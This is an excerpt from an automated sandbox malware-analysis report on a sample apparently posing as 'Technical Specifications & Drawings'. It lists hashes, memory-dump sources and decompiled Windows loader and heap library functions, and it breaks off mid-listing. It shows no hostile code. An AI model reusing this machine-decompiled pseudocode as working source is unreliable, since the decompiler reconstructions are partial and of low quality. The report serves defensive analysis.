                                                  • Opcode ID: 61cfa5152833f6dcd153ad34a5a5091083dcf2b76d512437eccc909b43aee28f
                                                  • Instruction ID: da2f0537cf7870cfab0db9fd2afd57d8c5c76e083032f621d088ec0bb2bb77ca
                                                  • Opcode Fuzzy Hash: 61cfa5152833f6dcd153ad34a5a5091083dcf2b76d512437eccc909b43aee28f
                                                  • Instruction Fuzzy Hash: 1190026921700006D1907199940870B4005A7D5242F92D429A1005568CC9558869B362
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 6 17e9660-17e966c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ce6251f54ea21b6ddd0a41b17907de5cfc05d3a2fe8728864cac2302ec14bc52
                                                  • Instruction ID: fc0f5dbfe2df482bb7edcb43531fcdb69cf3bee580cfa39c7a80653badf34a8b
                                                  • Opcode Fuzzy Hash: ce6251f54ea21b6ddd0a41b17907de5cfc05d3a2fe8728864cac2302ec14bc52
                                                  • Instruction Fuzzy Hash: 4B90027120500806D1907199840474B4005A7D5341F92C029A1015664DCA558A59B7E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 7 17e96e0-17e96ec LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0b35b4f96bf0ba9a11e6575ec53445d638f6ddf03b860ae2583c09f488c24d64
                                                  • Instruction ID: bdbca902dc2c13abc01a681ae1f705e44a8d47b8ef2ec35a15855cb11c25b1a6
                                                  • Opcode Fuzzy Hash: 0b35b4f96bf0ba9a11e6575ec53445d638f6ddf03b860ae2583c09f488c24d64
                                                  • Instruction Fuzzy Hash: 1890027120508806D1206199C40474B4005A7D4341F56C425A5414668DC6D58891B162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 17e967a-17e967f 1 17e968f-17e9696 LdrInitializeThunk 0->1 2 17e9681-17e9688 0->2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0db4f55efd2fc650b74e2ce093525a20a929cfc341adfb8f1729b69041f1adbb
                                                  • Instruction ID: f7c643861ef5564493646191c02feeeb7af93e8d146f5df96eb580dfaed93c80
                                                  • Opcode Fuzzy Hash: 0db4f55efd2fc650b74e2ce093525a20a929cfc341adfb8f1729b69041f1adbb
                                                  • Instruction Fuzzy Hash: FBB09B729054C5C9D621D7A4860C717F94077D4745F17C066D3020651B4778C0D1F5B6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004202EA Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346367490.0000000000420000.00000040.00000400.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_420000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 89309aa51be55b69ddfbaf9a31329526fb32ce1a990d0310af25fa036d4a6c99
                                                  • Instruction ID: 49abd73105c3619fbc1e913c838165e94ee9b1ff45d9a9f9c17da86f92efeca2
                                                  • Opcode Fuzzy Hash: 89309aa51be55b69ddfbaf9a31329526fb32ce1a990d0310af25fa036d4a6c99
                                                  • Instruction Fuzzy Hash: 81B09271CD120A4A4A2979B42A930AA7FA5A957159B0002AADC0A866219607422549C2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004202F0 Relevance: .0, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346367490.0000000000420000.00000040.00000400.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_420000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94a00c52131884b54b70ebc8f2fd5bdbfb529a04d8c8330ff7a004be8e45f986
                                                  • Instruction ID: f645e560157af655d831a6a22474729ebe2b8a94fd5d7f98a894b5c3787ab2ed
                                                  • Opcode Fuzzy Hash: 94a00c52131884b54b70ebc8f2fd5bdbfb529a04d8c8330ff7a004be8e45f986
                                                  • Instruction Fuzzy Hash: C6A02220CCA30C03002830FA2E83023B30C800000AF0003EAEC0C02A023C02A83200EB
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 0185B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Strings
                                                  • Go determine why that thread has not released the critical section., xrefs: 0185B3C5
                                                  • write to, xrefs: 0185B4A6
                                                  • The resource is owned shared by %d threads, xrefs: 0185B37E
                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 0185B48F
                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0185B2F3
                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0185B47D
                                                  • *** Inpage error in %ws:%s, xrefs: 0185B418
                                                  • *** enter .exr %p for the exception record, xrefs: 0185B4F1
                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0185B39B
                                                  • The critical section is owned by thread %p., xrefs: 0185B3B9
                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0185B484
                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0185B323
                                                  • read from, xrefs: 0185B4AD, 0185B4B2
                                                  • an invalid address, %p, xrefs: 0185B4CF
                                                  • The instruction at %p referenced memory at %p., xrefs: 0185B432
                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0185B476
                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0185B305
                                                  • *** enter .cxr %p for the context, xrefs: 0185B50D
                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0185B3D6
                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 0185B352
                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0185B53F
                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0185B2DC
                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0185B314
                                                  • The resource is owned exclusively by thread %p, xrefs: 0185B374
                                                  • <unknown>, xrefs: 0185B27E, 0185B2D1, 0185B350, 0185B399, 0185B417, 0185B48E
                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0185B38F
                                                  • This failed because of error %Ix., xrefs: 0185B446
                                                  • *** then kb to get the faulting stack, xrefs: 0185B51C
                                                  • a NULL pointer, xrefs: 0185B4E0
                                                  • The instruction at %p tried to %s , xrefs: 0185B4B6
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                  • API String ID: 0-108210295
                                                  • Opcode ID: d156acb15747a40286d8645e88f39fd3595c85317210641b4a69306c2ca4d7f7
                                                  • Instruction ID: acf658629af85367709d14d6cd505f05f29d9076e028590257a2d442d72fef26
                                                  • Opcode Fuzzy Hash: d156acb15747a40286d8645e88f39fd3595c85317210641b4a69306c2ca4d7f7
                                                  • Instruction Fuzzy Hash: 278105B1A40200FFDF369A4ADC96D7B7F67EFA6B55F440048F904AB212D2618751C7B2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01861C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 44%
                                                  			E01861C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x17848a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017AB150();
				} else {
					E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x189589c);
				E017AB150("Heap error detected at %p (heap handle %p)\n",  *0x18958a0);
				_t27 =  *0x1895898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01861E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017AB150();
				} else {
					E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E017AB150("Error code: %d - %s\n",  *0x1895898);
				_t113 =  *0x18958a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017AB150();
					} else {
						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017AB150("Parameter1: %p\n",  *0x18958a4);
				}
				_t115 =  *0x18958a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017AB150();
					} else {
						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017AB150("Parameter2: %p\n",  *0x18958a8);
				}
				_t117 =  *0x18958ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017AB150();
					} else {
						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017AB150("Parameter3: %p\n",  *0x18958ac);
				}
				_t119 =  *0x18958b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017AB150();
					} else {
						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x18958b4);
					E017AB150("Last known valid blocks: before - %p, after - %p\n",  *0x18958b0);
				} else {
					_t120 =  *0x18958b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017AB150();
				} else {
					E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E017AB150("Stack trace available at %p\n", 0x18958c0);
			}











                                                  0x01861c10
                                                  0x01861c16
                                                  0x01861c1e
                                                  0x01861c3d
                                                  0x01861c3e
                                                  0x01861c20
                                                  0x01861c35
                                                  0x01861c3a
                                                  0x01861c44
                                                  0x01861c55
                                                  0x01861c5a
                                                  0x01861c65
                                                  0x01861c67
                                                  0x00000000
                                                  0x01861c6e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01861c67
                                                  0x01861cdc
                                                  0x01861ce5
                                                  0x01861d04
                                                  0x01861d05
                                                  0x01861ce7
                                                  0x01861cfc
                                                  0x01861d01
                                                  0x01861d0b
                                                  0x01861d17
                                                  0x01861d1f
                                                  0x01861d25
                                                  0x01861d30
                                                  0x01861d4f
                                                  0x01861d50
                                                  0x01861d32
                                                  0x01861d47
                                                  0x01861d4c
                                                  0x01861d61
                                                  0x01861d67
                                                  0x01861d68
                                                  0x01861d6e
                                                  0x01861d79
                                                  0x01861d98
                                                  0x01861d99
                                                  0x01861d7b
                                                  0x01861d90
                                                  0x01861d95
                                                  0x01861daa
                                                  0x01861db0
                                                  0x01861db1
                                                  0x01861db7
                                                  0x01861dc2
                                                  0x01861de1
                                                  0x01861de2
                                                  0x01861dc4
                                                  0x01861dd9
                                                  0x01861dde
                                                  0x01861df3
                                                  0x01861df9
                                                  0x01861dfa
                                                  0x01861e00
                                                  0x01861e0a
                                                  0x01861e13
                                                  0x01861e32
                                                  0x01861e33
                                                  0x01861e15
                                                  0x01861e2a
                                                  0x01861e2f
                                                  0x01861e39
                                                  0x01861e4a
                                                  0x01861e02
                                                  0x01861e02
                                                  0x01861e08
                                                  0x00000000
                                                  0x00000000
                                                  0x01861e08
                                                  0x01861e5b
                                                  0x01861e7a
                                                  0x01861e7b
                                                  0x01861e5d
                                                  0x01861e72
                                                  0x01861e77
                                                  0x01861e95

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                  • API String ID: 0-2897834094
                                                  • Opcode ID: 809418154b7d69afe69c2cac46422c544604145cb16014999f6a0ab0bd4bbc60
                                                  • Instruction ID: 1a7f6bb0392e9d68d3282a2c04e57932aff82895a72b6c5a4d076b0e440544a7
                                                  • Opcode Fuzzy Hash: 809418154b7d69afe69c2cac46422c544604145cb16014999f6a0ab0bd4bbc60
                                                  • Instruction Fuzzy Hash: BA61E833955149DFD721EB49E8DCD25F3A8E794B20B49813EF409AF316DA249A40CF0A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01862D82 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 228timeCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 64%
                                                  			E01862D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x1880e80);
				E017FD0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E017A40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E018630C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E017AB150();
						} else {
							E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E017AB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E017BEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E01864496(_t181, 0);
						_t177 = L017C4620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E018649A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E0185FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E017A1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E017D16C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E01864496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x1896360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x1896364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x1896366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E017AB150();
								} else {
									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0184D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E017AB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E017AB150();
								} else {
									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E017AB150("Just allocated block at %p for %Ix bytes\n",  *0x1896360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x1896378 = 1;
									 *0x18960c0 = 0;
									asm("int3");
									 *0x1896378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x1895708; // 0x0
					 *0x189b1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E017FD130(0, _t177, _t181);
				}
			}





















                                                  0x01862d82
                                                  0x01862d84
                                                  0x01862d89
                                                  0x01862d8e
                                                  0x01862d90
                                                  0x01862d92
                                                  0x01862d97
                                                  0x01862d9a
                                                  0x01862da4
                                                  0x01862dc0
                                                  0x01862dc3
                                                  0x01862dd1
                                                  0x01862dd6
                                                  0x01862dd8
                                                  0x018630a7
                                                  0x018630a7
                                                  0x018630aa
                                                  0x018630aa
                                                  0x018630ad
                                                  0x018630b4
                                                  0x00000000
                                                  0x018630b9
                                                  0x01862de3
                                                  0x01862de8
                                                  0x01862deb
                                                  0x01862dee
                                                  0x01862df1
                                                  0x01862df3
                                                  0x01862dfb
                                                  0x01862dfb
                                                  0x01862df5
                                                  0x01862df5
                                                  0x01862df5
                                                  0x01862e04
                                                  0x01862e0a
                                                  0x01862e0d
                                                  0x01862e11
                                                  0x01862e11
                                                  0x01862e12
                                                  0x01862e15
                                                  0x01862e18
                                                  0x01862e1a
                                                  0x01863027
                                                  0x01863027
                                                  0x0186302d
                                                  0x01863030
                                                  0x0186304f
                                                  0x01863054
                                                  0x01863032
                                                  0x01863047
                                                  0x0186304c
                                                  0x0186305a
                                                  0x01863063
                                                  0x00000000
                                                  0x01862e20
                                                  0x01862e20
                                                  0x01862e23
                                                  0x00000000
                                                  0x00000000
                                                  0x01862e29
                                                  0x01862e2b
                                                  0x01862e47
                                                  0x01862e2d
                                                  0x01862e33
                                                  0x01862e38
                                                  0x01862e3f
                                                  0x01862e42
                                                  0x01862e42
                                                  0x01862e4e
                                                  0x01862e5d
                                                  0x01862e5f
                                                  0x01862e62
                                                  0x01862e66
                                                  0x01862e6b
                                                  0x01862e6d
                                                  0x00000000
                                                  0x01862e73
                                                  0x01862e73
                                                  0x01862e76
                                                  0x01862e7a
                                                  0x01862e83
                                                  0x01862e83
                                                  0x01862e83
                                                  0x01862e85
                                                  0x01862e87
                                                  0x01862e8a
                                                  0x01862e8d
                                                  0x01862e92
                                                  0x01862e9c
                                                  0x01862e9f
                                                  0x01862ea1
                                                  0x01862ea2
                                                  0x01862ea6
                                                  0x01862ea6
                                                  0x01862e9f
                                                  0x01862eab
                                                  0x01862eaf
                                                  0x01862edf
                                                  0x01862ee2
                                                  0x01862ee5
                                                  0x01862eb1
                                                  0x01862eb3
                                                  0x01862eb8
                                                  0x01862ebd
                                                  0x01862ec4
                                                  0x01862ed6
                                                  0x01862ec6
                                                  0x01862ec7
                                                  0x01862ecc
                                                  0x01862ecf
                                                  0x01862ed2
                                                  0x01862ed2
                                                  0x01862ed9
                                                  0x01862ed9
                                                  0x01862ee8
                                                  0x01862eeb
                                                  0x01862eef
                                                  0x01862ef2
                                                  0x01862efe
                                                  0x01862f04
                                                  0x01862f04
                                                  0x01862f04
                                                  0x01862f06
                                                  0x01862f0d
                                                  0x01862f0f
                                                  0x01862f13
                                                  0x01862f13
                                                  0x01862f1b
                                                  0x01862f21
                                                  0x01862f27
                                                  0x01862f95
                                                  0x01862f98
                                                  0x01862f9b
                                                  0x01862fa0
                                                  0x00000000
                                                  0x00000000
                                                  0x01862fa6
                                                  0x01862fa9
                                                  0x01862fac
                                                  0x00000000
                                                  0x00000000
